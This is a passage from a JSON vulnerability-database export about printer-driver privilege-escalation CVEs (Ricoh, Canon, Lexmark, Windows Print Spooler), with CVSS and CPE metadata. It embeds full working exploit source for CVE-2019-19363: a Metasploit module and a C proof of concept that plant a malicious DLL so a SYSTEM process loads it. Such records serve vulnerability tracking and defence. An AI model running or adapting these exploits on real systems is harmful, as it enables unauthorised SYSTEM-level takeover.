"COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35449"], "modified": "2021-09-20T12:21:00", "cpe": ["cpe:/a:lexmark:g3_driver:3.2.0.0", "cpe:/a:lexmark:g2_driver:2.7.1.0", "cpe:/a:lexmark:g4_driver:4.2.1.0", "cpe:/a:lexmark:universal_print_driver:2.15.1.0"], "id": "CVE-2021-35449", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35449", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:lexmark:g3_driver:3.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:lexmark:g4_driver:4.2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:lexmark:g2_driver:2.7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:lexmark:universal_print_driver:2.15.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:37:53", "description": "The Canon TR150 print driver through 3.71.2.10 is vulnerable to a privilege escalation issue. 
During the add printer process, a local attacker can overwrite CNMurGE.dll and, if timed properly, the overwritten DLL will be loaded into a SYSTEM process resulting in escalation of privileges. This occurs because the driver drops a world-writable DLL into a CanonBJ %PROGRAMDATA% location that gets loaded by printisolationhost (a system process).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T18:15:00", "type": "cve", "title": "CVE-2021-38085", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38085"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:canon:pixma_tr150_firmware:3.71.2.10"], "id": "CVE-2021-38085", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38085", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canon:pixma_tr150_firmware:3.71.2.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-29T15:17:04", "description": "An issue was discovered in Ricoh (including Savin and Lanier) Windows printer drivers prior to 2020 that allows attackers local privilege escalation. 
Affected drivers and versions are: PCL6 Driver for Universal Print - Version 4.0 or later PS Driver for Universal Print - Version 4.0 or later PC FAX Generic Driver - All versions Generic PCL5 Driver - All versions RPCS Driver - All versions PostScript3 Driver - All versions PCL6 (PCL XL) Driver - All versions RPCS Raster Driver - All version", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-24T18:15:00", "type": "cve", "title": "CVE-2019-19363", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363"], "modified": "2023-02-10T16:59:00", "cpe": ["cpe:/a:ricoh:rpcs_driver:-", "cpe:/a:ricoh:postscript3_driver:-", "cpe:/a:ricoh:generic_pcl5_driver:-", "cpe:/a:ricoh:pc_fax_generic_driver:-", "cpe:/a:ricoh:rpcs_raster_driver:-", "cpe:/a:ricoh:pcl6_\\(pcl_xl\\)_driver:-"], "id": "CVE-2019-19363", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19363", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ricoh:rpcs_driver:-:*:*:*:*:*:*:*", "cpe:2.3:a:ricoh:pcl6_\\(pcl_xl\\)_driver:-:*:*:*:*:*:*:*", 
"cpe:2.3:a:ricoh:rpcs_raster_driver:-:*:*:*:*:*:*:*", "cpe:2.3:a:ricoh:generic_pcl5_driver:-:*:*:*:*:*:*:*", "cpe:2.3:a:ricoh:postscript3_driver:-:*:*:*:*:*:*:*", "cpe:2.3:a:ricoh:pc_fax_generic_driver:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T22:09:25", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2019-19363. Reason: This candidate is a reservation duplicate of CVE-2019-19363. Notes: All CVE users should reference CVE-2019-19363 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.", "cvss3": {}, "published": "2019-12-05T16:15:00", "type": "cve", "title": "CVE-2019-19008", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2019-19008", "CVE-2019-19363"], "modified": "2019-12-05T16:15:00", "cpe": [], "id": "CVE-2019-19008", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19008", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2023-05-30T14:31:13", "description": "A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files.To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.The update addresses the vulnerability by correcting how Windows handles cabinet files., aka 'Windows Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", 
"title": "CVE-2020-1300", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1300"], "modified": "2020-06-16T13:33:00", "cpe": ["cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2020-1300", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1300", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:33", "description": "Windows Print Spooler Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-16T21:15:00", "type": "cve", "title": "CVE-2021-34481", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2023-04-11T18:59:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-34481", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34481", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2023-02-20T05:00:33", "description": "Various Ricoh printer drivers allow escalation of privileges on Windows systems. 
For vulnerable drivers, a low-privileged user can read/write files within the `RICOH_DRV` directory and its subdirectories. `PrintIsolationHost.exe`, a Windows process running as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs during the installation of a printer. A user can elevate to SYSTEM by writing a malicious DLL to the vulnerable driver directory and adding a new printer with a vulnerable driver. This module leverages the `prnmngr.vbs` script to add and delete printers. Multiple runs of this module may be required given successful exploitation is time-sensitive.\n", "cvss3": {}, "published": "2020-01-24T22:14:51", "type": "metasploit", "title": "Ricoh Driver Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19363"], "modified": "2021-09-08T21:59:25", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-RICOH_DRIVER_PRIVESC-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/ricoh_driver_privesc/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Ricoh Driver Privilege Escalation',\n 'Description' => %q{\n Various Ricoh printer drivers allow escalation of\n privileges on Windows systems.\n\n For vulnerable drivers, a low-privileged user can\n read/write files within the `RICOH_DRV` directory\n and its subdirectories.\n\n `PrintIsolationHost.exe`, a Windows process running\n as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n during the installation of a printer. 
A user can\n elevate to SYSTEM by writing a malicious DLL to\n the vulnerable driver directory and adding a new\n printer with a vulnerable driver.\n\n This module leverages the `prnmngr.vbs` script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Alexander Pudwill', # discovery & PoC\n 'Pentagrid AG', # PoC\n 'Shelby Pace' # msf module\n ],\n 'References' => [\n [ 'CVE', '2019-19363'],\n [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'Payload' => {\n },\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [\n 'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }\n ]\n ],\n 'Notes' => {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'Stability' => [ SERVICE_RESOURCE_LOSS ]\n },\n 'DisclosureDate' => '2020-01-22',\n 'DefaultTarget' => 0,\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_sys_process_execute\n ]\n }\n }\n )\n )\n\n self.needs_cleanup = true\n end\n\n def check\n @driver_path = ''\n dir_name = \"C:\\\\ProgramData\\\\RICOH_DRV\"\n\n return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)\n\n driver_names = dir(dir_name)\n\n return CheckCode::Detected(\"Detected Ricoh driver directory, but no installed drivers\") unless driver_names.length\n\n vulnerable = false\n driver_names.each do |driver_name|\n full_path = \"#{dir_name}\\\\#{driver_name}\\\\_common\\\\dlz\"\n next unless directory?(full_path)\n\n @driver_path = full_path\n\n res = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\")\n next unless res.include?('Everyone:')\n next unless res.match(/\\(F\\)/)\n\n vulnerable = true\n break\n end\n\n return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable\n\n 
vprint_status(\"Vulnerable driver directory: #{@driver_path}\")\n CheckCode::Appears('Ricoh driver directory has full permissions')\n end\n\n def add_printer(driver_name)\n fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)\n\n dll_data = generate_payload_dll\n dll_path = \"#{@driver_path}\\\\headerfooter.dll\"\n\n temp_path = expand_path('%TEMP%\\\\headerfooter.dll')\n vprint_status(\"Writing dll to #{temp_path}\")\n\n bat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\")\n cp_cmd = \"copy /y \\\"#{temp_path}\\\" \\\"#{dll_path}\\\"\"\n bat_file = <<~HEREDOC\n :repeat\n #{cp_cmd} && goto :repeat\n HEREDOC\n\n write_file(bat_file_path, bat_file)\n write_file(temp_path, dll_data)\n register_files_for_cleanup(bat_file_path, temp_path)\n\n script_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\"\n bat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\"\n print_status(\"Adding printer #{@printer_name}...\")\n client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })\n vprint_status(\"Executing script...\")\n cmd_exec(bat_cmd)\n rescue Rex::Post::Meterpreter::RequestError => e\n e_log(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n end\n\n def exploit\n fail_with(Failure::None, 'Already running as SYSTEM') if is_system?\n\n fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'\n\n if sysinfo['Architecture'] != payload.arch.first\n fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')\n end\n\n @printer_name = Rex::Text.rand_text_alpha(5..9)\n @script_path = \"C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs\"\n drvr_name = @driver_path.split('\\\\')\n drvr_name_idx = drvr_name.index('RICOH_DRV') + 1\n drvr_name = drvr_name[drvr_name_idx]\n\n add_printer(drvr_name)\n end\n\n def cleanup\n 
print_status(\"Deleting printer #{@printer_name}\")\n Rex.sleep(3)\n delete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\"\n client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ricoh_driver_privesc.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:37", "description": "\nRicoh Printer Drivers - Local Privilege Escalation", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-22T00:00:00", "type": "exploitpack", "title": "Ricoh Printer Drivers - Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363"], "modified": "2020-01-22T00:00:00", "id": "EXPLOITPACK:CCA4761A63552664BBDE027DD8AD1FAE", "href": "", "sourceData": "/*\n\nThis proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites\na DLL file before the library is loaded (CVE-2019-19363).\n\nWritten by Pentagrid AG, 2019.\n\nCf. 
https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/\n\nCredits: Alexander Pudwill\n\nThis proof of concept code is based on the ReadDirectoryChangesW API call to\nget notified about changes on files and directories and reuses parts from the example from\nhttps://www.experts-exchange.com/questions/22507220/ReadDirectoryChangesW-FWATCH-MSDN-sample-not-working.html\n\n*/\n#include <stdio.h>\n#include <stdlib.h>\n#include <conio.h>\n#include <windows.h>\n\n#define MAX_BUFFER 4096\n\nint change_counter = 0;\nconst WCHAR * const BaseDirName = L\"C:\\\\ProgramData\";\nconst WCHAR * TargetDllFullFilePath, * TargetDLLRelFilePath, * MaliciousLibraryFile, * PrinterName;\nDWORD dwNotifyFilter = FILE_NOTIFY_CHANGE_LAST_WRITE |\n FILE_NOTIFY_CHANGE_SIZE |\n FILE_NOTIFY_CHANGE_LAST_ACCESS |\n FILE_NOTIFY_CHANGE_CREATION;\n\ntypedef struct _DIRECTORY_INFO {\n HANDLE hDir;\n TCHAR lpszDirName[MAX_PATH];\n CHAR lpBuffer[MAX_BUFFER];\n DWORD dwBufLength;\n OVERLAPPED Overlapped;\n} DIRECTORY_INFO, *PDIRECTORY_INFO, *LPDIRECTORY_INFO;\n\nDIRECTORY_INFO DirInfo;\n\nvoid WINAPI HandleDirectoryChange(DWORD dwCompletionPort) {\n DWORD numBytes, cbOffset;\n LPDIRECTORY_INFO di;\n LPOVERLAPPED lpOverlapped;\n PFILE_NOTIFY_INFORMATION fni;\n WCHAR FileName[MAX_PATH];\n\n do {\n\n GetQueuedCompletionStatus((HANDLE)dwCompletionPort, &numBytes, (LPDWORD)&di, &lpOverlapped, INFINITE);\n\n if (di) {\n fni = (PFILE_NOTIFY_INFORMATION)di->lpBuffer;\n\n do {\n cbOffset = fni->NextEntryOffset;\n\n // get filename\n size_t num_elem = fni->FileNameLength / sizeof(WCHAR);\n if (num_elem >= sizeof(FileName) / sizeof(WCHAR)) num_elem = 0;\n\n wcsncpy_s(FileName, sizeof(FileName)/sizeof(WCHAR), fni->FileName, num_elem);\n FileName[num_elem] = '\\0';\n wprintf(L\"+ Event for %s [%d]\\n\", FileName, change_counter);\n\n if (fni->Action == FILE_ACTION_MODIFIED) {\n\n if (!wcscmp(FileName, TargetDLLRelFilePath)) {\n\n if (change_counter > 0)\n 
change_counter--;\n if (change_counter == 0) {\n change_counter--;\n\n if (CopyFile(MaliciousLibraryFile, TargetDllFullFilePath, FALSE))\n wprintf(L\"+ File %s copied to %s.\\n\", MaliciousLibraryFile, TargetDllFullFilePath);\n\n else {\n wchar_t buf[256];\n\n FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,\n NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),\n buf, (sizeof(buf) / sizeof(wchar_t)), NULL);\n\n wprintf(L\"+ Failed to copy file %s to %s: %s\\n\", MaliciousLibraryFile, TargetDllFullFilePath, buf);\n }\n\n exit(1);\n } // end of trigger part\n }\n } // eo action mod\n fni = (PFILE_NOTIFY_INFORMATION)((LPBYTE)fni + cbOffset);\n\n } while (cbOffset);\n\n // Reissue the watch command\n ReadDirectoryChangesW(di->hDir, di->lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &di->dwBufLength, &di->Overlapped, NULL);\n }\n } while (di);\n}\n\nvoid WINAPI InstallPrinter() {\n WCHAR cmd_buf[1000];\n swprintf(cmd_buf, sizeof(cmd_buf), L\"/c rundll32 printui.dll, PrintUIEntry /if /b \\\"Printer\\\" /r lpt1: /m \\\"%s\\\"\", PrinterName);\n wprintf(L\"+ Adding printer: %s\\n\", cmd_buf);\n\n unsigned long ret = (unsigned long) ShellExecuteW(0, L\"open\", L\"cmd\", cmd_buf, NULL, SW_HIDE);\n if(ret <= 32) // That seems to be the way to handle ShellExecuteW's ret value.\n wprintf(L\"+ Failed launching command. 
Return value is %d\\n\", ret);\n}\n\nvoid WINAPI WatchDirectories(HANDLE hCompPort) {\n DWORD tid;\n HANDLE hThread;\n\n ReadDirectoryChangesW(DirInfo.hDir, DirInfo.lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &DirInfo.dwBufLength, &DirInfo.Overlapped, NULL);\n\n // Create a thread to sit on the directory changes\n hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)HandleDirectoryChange, hCompPort, 0, &tid);\n\n // Just loop and wait for the user to quit\n InstallPrinter();\n while (_getch() != 'q');\n\n // The user has quit - clean up\n PostQueuedCompletionStatus(hCompPort, 0, 0, NULL);\n\n // Wait for the Directory thread to finish before exiting\n WaitForSingleObject(hThread, INFINITE);\n CloseHandle(hThread);\n}\n\n\nint wmain(int argc, WCHAR *argv[]) {\n HANDLE hCompPort = NULL; // Handle To a Completion Port\n\n if (argc == 6) {\n PrinterName = argv[1];\n TargetDllFullFilePath = argv[2];\n TargetDLLRelFilePath = argv[3];\n MaliciousLibraryFile = argv[4];\n change_counter = _wtoi(argv[5]);\n }\n else {\n wprintf(L\"+ Usage: %s <printer_name> <fullpath_monitor_dll> <rel_path_monitor_dll> <new_dll> <counter>\\n\", argv[0]);\n return 0;\n }\n wprintf(L\"+ Monitoring directory %s\\n\", BaseDirName);\n\n // Get a handle to the directory\n DirInfo.hDir = CreateFile(BaseDirName,\n FILE_LIST_DIRECTORY,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n OPEN_EXISTING,\n FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED,\n NULL);\n\n if (DirInfo.hDir == INVALID_HANDLE_VALUE) {\n wprintf(L\"Unable to open directory %s. GLE=%ld. 
Terminating...\\n\",\n BaseDirName, GetLastError());\n return 0;\n }\n\n lstrcpy(DirInfo.lpszDirName, BaseDirName);\n\n if (HANDLE hFile = CreateFile(TargetDllFullFilePath,\n GENERIC_WRITE,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n CREATE_ALWAYS,\n FILE_ATTRIBUTE_NORMAL,\n NULL)) {\n wprintf(L\"+ File %s created\\n\", TargetDllFullFilePath);\n CloseHandle(hFile);\n }\n else\n wprintf(L\"+ File %s could not be created\\n\", TargetDllFullFilePath);\n\n\n if ((hCompPort = CreateIoCompletionPort(DirInfo.hDir, hCompPort, (ULONG_PTR)&DirInfo, 0)) == NULL) {\n wprintf(L\"+ CreateIoCompletionPort() failed.\\n\");\n return 0;\n }\n\n wprintf(L\"+ Press <q> to exit\\n\");\n\n // Start watching\n WatchDirectories(hCompPort);\n\n CloseHandle(DirInfo.hDir);\n CloseHandle(hCompPort);\n return 1;\n}", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-20T05:56:35", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": 